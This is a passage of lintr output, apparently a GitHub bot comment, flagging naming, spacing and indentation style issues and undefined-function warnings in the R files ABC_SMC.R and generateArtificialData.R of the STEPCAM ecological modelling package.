lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:88:6:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:89:7:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L89) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L91) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:18:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:18:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:18:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:13:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:102:17:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:16:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:16:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:16:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:111:21:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L111) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:112:26:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L112) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:16:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L120) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:7:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L124) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:124:10:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:23:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L124) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:124:29:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:5:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L146) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:12:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:29:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L158) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L160) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:162:19:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L162) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:186:20:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L186) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:186:20:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L186) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:187:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L187) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L198) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:201:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L201) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:9:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:27:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:19:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:19:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:19:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:14:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:18:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:17:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:17:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:24:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:40:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L220) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:222:24:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:40:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L222) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:223:13:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:13:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L227) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:227:14:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:34:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:233:21:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L233) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:233:22:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:235:13:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:38:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:253:54:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L253) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:256:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L256) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:9:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:32:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L257) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:260:27:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L260) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:260:27:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L260) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:20:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:20:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:20:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:273:61:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L273) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:277:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/ABC_SMC.R#L277) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"Can't stop at iteration 1 - please set stop_at_iteration to 2 if you only want to generate from the prior\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = 